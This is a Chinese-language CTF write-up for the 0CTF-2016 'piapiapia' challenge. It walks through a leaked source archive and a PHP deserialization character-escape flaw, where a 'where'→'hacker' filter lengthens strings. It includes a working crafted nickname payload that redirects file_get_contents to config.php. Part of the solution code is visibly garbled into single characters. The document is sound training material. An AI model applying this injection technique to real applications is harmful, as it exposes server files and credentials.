[0CTF-2016] piapiapia
PHP反序列化字符逃逸
1.www.zip源码泄露
试了下发现不太像sql注入,扫下目录发现www.zip泄露
最近好多题都是这种源码泄露,建议字典齐全一点,不然扫不出来真的难受
2.源码
源码还挺多
config.php里面看到有flag,最后目标应该就是读取到config里面的flag就可以了
$config[‘hostname’] = ‘127.0.0.1’;
$config[‘username’] = ‘root’;
$config[‘password’] = ‘’;
$config[‘database’] = ‘’;
$flag = ‘’;
接着找找config.php被谁include了
找到profile.php
require_once(‘class.php’);
if($_SESSION[‘username’] == null) {
die(‘Login First’);
}
$username = $_SESSION[‘username’];
$profile=$user->show_profile($username);
if($profile == null) {
header(‘Location: update.php’);
}
else {
$profile = unserialize($profile);
$phone = $profile[‘phone’];
$email = $profile[‘email’];
$nickname = $profile[‘nickname’];
$photo = base64_encode(file_get_contents($profile[‘photo’]));
file_get_content应该就是注入点了,不过前面进行了一次反序列化
但是不能直接修改photo这个变量,咱们可控的变量只有nickname
看到nickname传入时会进行过滤,看到过滤函数
public function filter($string) {
$escape = array(’\’’, ‘\\\\’);
$escape = ‘/’ . implode(’|’, $escape) . ‘/’;
$string = preg_replace($escape, ‘_’, $string);
$safe = array(‘select’, ‘insert’, ‘update’, ‘delete’, ‘where’);
$safe = ‘/’ . implode(’|’, $safe) . ‘/i’;
return preg_replace($safe, ‘hacker’, $string);
}
这里把关键字替换了,不过替换的时候把where替换成hacker,5个字符替换成6个字符
而序列化的时候不会改变前面的大小,就会导致字符逃逸
3.解题
function filter($string){
$safe = array(‘select’, ‘insert’, ‘update’, ‘delete’, ‘where’);
$safe = ‘/’ . implode(’|’,s
a
f
e
)
.
′
/
i
′
;
r
e
t
u
r
n
p
r
e
g
r
e
p
l
a
c
e
(
safe) . ‘/i’; return preg_replace(
safe).′/i′;returnpregreplace(safe, ‘hacker’, $string);
}
$profile[‘phone’]=‘12345678901’;
$profile[‘email’]=‘1@qq.com’;
$profile[‘nickname’]=‘wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere”;s:5:“photo”;s:10:“config.php”;}’;
$profile[‘photo’]=‘upload/21232f297a57a5a743894a0e4a801fc3’;
var_dump(filter(serialize($profile)));
结果:
string(392) “a:4:{s:5:“phone”;s:11:“12345678901”;s:5:“email”;s:8:“1@qq.com”;s:8:“nickname”;s:198:“hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker”;s:5:“photo”;s:10:“config.php”;}”;s:5:“photo”;s:39:“upload/21232f297a57a5a743894a0e4a801fc3”;}”
其实就多试试就ok了